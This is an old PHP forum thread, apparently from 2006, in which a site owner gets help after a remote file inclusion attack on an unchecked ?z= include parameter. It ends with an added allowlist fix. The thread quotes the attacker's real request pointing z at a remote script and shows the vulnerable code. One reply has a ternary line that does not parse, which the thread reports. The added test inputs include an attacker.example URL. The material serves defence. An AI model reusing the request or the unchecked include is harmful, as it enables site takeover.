salsa

  1. Thank you!!! Well, it still doesn't serve the second page, but I think that is because it's not serving the ".php" part. I will do some studying and will try to come up with code myself that tests for whether or not .php is included in the variable (and if not, appends it, of course). I would like to add that I didn't mean for my earlier comment to sound snippy (when I reread it, it sounded like it could be), but I was frustrated with trying to read code that wasn't familiar to me. Sure, I could read it in general, but the syntax was not normal. So I would like you to know that I really, really appreciate the help, and especially the link to the help pages. :smile: :smile: :smile:
  2. I think I'm starting to understand. I took a shot at the code below and got this:

     Parse error: parse error, unexpected '?' in /homepages/25/d146129605/htdocs/index.php on line 34

     and assume they're talking about this:

     if ($zfile) ? include ($zfile) : include('home.php');

     What do I do with the ? in the line? Or where do I go to start trying to figure out how to fix it? I assume long-term I'm going to have to learn php, but right now I'm just focused on not getting hacked again :-/

     And, by the way, they *don't* by any stretch of the imagination, have the same syntax. I cannot for the life of me figure out what that line, or the line below it, is supposed to do. Call me stupid if you want, but it is *NOT* obvious to someone who is new at it.

     I was able to get SemiApocalyptic's example to work, but it only serves the home page. There *is* a second page that has to be served, but when you click on the second page, it shows the correct URL but the middle section is blank. If you click Home, the URL changes appropriately, but the middle section is again blank.

     [quote] QUOTE(Crayon Violent @ Jun 9 2006, 12:28 PM)
     foreign code...? js and php have pretty much the same syntax. this really isn't that hard to implement. here's another example of pretty much the same thing that was already mentioned, with the code you provided above:

     index.php
     [code]
     <body>
     <?php @include('top.php'); ?>
     <div id="frame">
     <div id="leftside"><?php @include('lside.php'); ?></div>
     <div id="maintext">
     <?php
     //put your files in here. just add more in if you have more than 3
     $acceptablefiles = array('home.php','contact.php','register.php');
     if ($_GET['z']) {
        foreach ($acceptablefiles as $val) {
           if ($val == $_GET['z']) {
              $zfile = $val;
           }
        }
        if ($zfile) ? include ($zfile) : include('home.php');
     } else {
        include ('home.php');
     }
     ?>
     </div>
     <div id="rightside"><?php @include('rside.php'); ?></div>
     </div></body></html>
     [/code]
     [/quote]
  3. Thanks! This is what is foreign to me: ("/:\/\//", $value)) But overall since there is only one page to be displayed as "home.php" I don't understand why I would need the whole z reference anyway? That's why it's so foreign to me. There is one top, one bottom, one left, one right, one home. They're all referenced in index.php, and the only file for the middle of the page is home.php. There is no z.php, which is why I thought maybe the hacker put that in there. So my question to you all (after I thank you SO much for all the replacement code!!!) is, why do I need this at all? Why not just <?php @include('home.php'); ?> ? Why do I need to go to all the trouble of looking for a page that doesn't exist anyway?
  4. [quote] QUOTE(SemiApocalyptic @ Jun 9 2006, 11:14 AM)
     It appears as though the attacker was running a scriptkiddie-esque panel of tools that allow them to view details about the server and the versions of everything running, view your php.ini file and run phpinfo(), browse around your directories and attempt to alter, delete and upload files to your server. There's also some fields for attempting to connect and dump the contents of databases. Some IRC things, and there's a bunch of other stuff too. Looks like it's tooled up for attacking *NIX based servers by the look at some of the commands that it's attempting to execute. You can prevent stuff like this running within your site by making the alteration I (and kenrbnsn) suggested further up this thread. A JavaScript equivalent will *not* work.
     [/quote]

     Great! Amazing you can tell that from a couple lines of code. I wasn't looking for a js equivalent, just trying to tell you that I really don't understand what I need to do to fix this. It looks like a foreign language to me. Thanks for looking at it, anyway. Not sure how I'm going to fix it, or maybe just turn it all into straight html.
  5. [quote] QUOTE(kenrbnsn @ Jun 9 2006, 04:53 AM)
     The first check I do in almost all of my scripts is to check any incoming parameters for known exploits... "content-type" in forms that generate email, "://" in any parameters where I'm not expecting that string. If I find them, I email the $_SERVER, $_POST, and $_GET arrays to myself and then use the header() function to issue a 404 error message. If the address where the attempt was done from is identifiable, I send a warning email to the abuse address at that site. For more information explore the PHP Security Consortium web site (http://phpsec.org/).

     Ken
     [/quote]

     Is there any possibility you can write that out for someone who knows html & javascript? I'm sure there's great info in your words, I just don't understand them. Thanks!
  6. [quote] QUOTE(hvle @ Jun 8 2006, 10:04 PM)
     how can we help you with a "index.php?z=http://someone's site"
     [/quote]

     Sorry, I tried to post the entire line they used, but the forum wouldn't let me do it. Here is the code that is currently in my index.php. Is it possible that the hacker changed the page to have all the z stuff? I don't remember it being there before, I only remember the stuff that was @include('home.php'), etc.

     [code]
     <body>
     <?php @include('top.php'); ?>
     <div id="frame">
     <div id="leftside"><?php @include('lside.php'); ?></div>
     <div id="maintext">
     <?php
     $z=$_GET['z'];
     if(!isset($z)) {
        @include('home.php');
     } else {
        @include($z.'.php');
     }
     ?>
     </div>
     <div id="rightside"><?php @include('rside.php'); ?></div>
     </div></body></html>
     [/code]

     I think the idea was originally that php would be used to serve the different sides of the page like includes. Do I need all the z stuff? How can I change this so it's not hackable? Ugggh, php looks like a foreign language to me.

     This is what they used to exploit: (I don't know if it'll post properly but trying again).

     "POST /index.php?z=http://ciberia.ya.com/jest3r/sep3.php? HTTP/1.0"
  7. Hi all! Please excuse me, I'm new, but desperate at the moment. It appears that someone is repeatedly hacking my site, and my host is blaming *me*. Or at least my "scripts." Except that there aren't any scripts on my site at all! But I think someone is using a vulnerability of PHP to hack my site. Anyway, the php in the site is only for organization. There is really nothing to it. It serves up pages, keeps things in order. I've been through every page and can't find a thing wrong. Below are the lines that my host is accusing as hacks. None of it is actually accessing files on my site, or at least I can't find any foreign files on my site. The common theme is index.php?z=http://someone's site. Please help! I'm desperate!!!
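
The posts above describe an index.php that passes `?z=` straight to `include`, and an allowlist fix whose ternary line does not parse. The following is an added example, not code from the thread or any of its posters, showing one working form of that allowlist together with kenrbnsn's "://" check. `PAGES` and `resolve_page()` are hypothetical names, the page files are the ones named in the thread, and the sample inputs are constructed.

```php
<?php
// Added example, not code from the thread. resolve_page() and PAGES are
// hypothetical names; the page files are the ones listed in the thread.
// Place this at the top of index.php, before any HTML is output.

// The only values ?z= may take, mapped to the file each one loads.
const PAGES = [
    'home'     => 'home.php',
    'contact'  => 'contact.php',
    'register' => 'register.php',
];

// Return the file to include, or null when the request must be refused.
function resolve_page($z): ?string
{
    if ($z === null || $z === '') {
        return PAGES['home'];            // no parameter: default page
    }
    if (!is_string($z) || strpos($z, '://') !== false) {
        return null;                     // array input or a URL: refuse
    }
    // Links may say "contact" or "contact.php"; accept both spellings.
    $name = preg_replace('/\.php$/', '', $z);
    return PAGES[$name] ?? null;         // unknown names never reach include
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs to show the decisions when run as: php thisfile.php
    $samples = [null, 'contact', 'contact.php', '../top',
                'http://attacker.example/x.php?', ['a']];
    foreach ($samples as $in) {
        echo json_encode($in), ' => ', json_encode(resolve_page($in)), "\n";
    }
    exit;
}

$file = resolve_page($_GET['z'] ?? null);
if ($file === null) {
    error_log('refused z parameter: ' . json_encode($_GET['z']));
    http_response_code(404);
    exit('Page not found');
}
// Then, inside <div id="maintext">:  include __DIR__ . '/' . $file;
```

Setting `allow_url_include` to Off in php.ini (the default since PHP 5.2) blocks the remote-URL form of this request, but the allowlist is still what keeps local paths such as `../top` out of `include`.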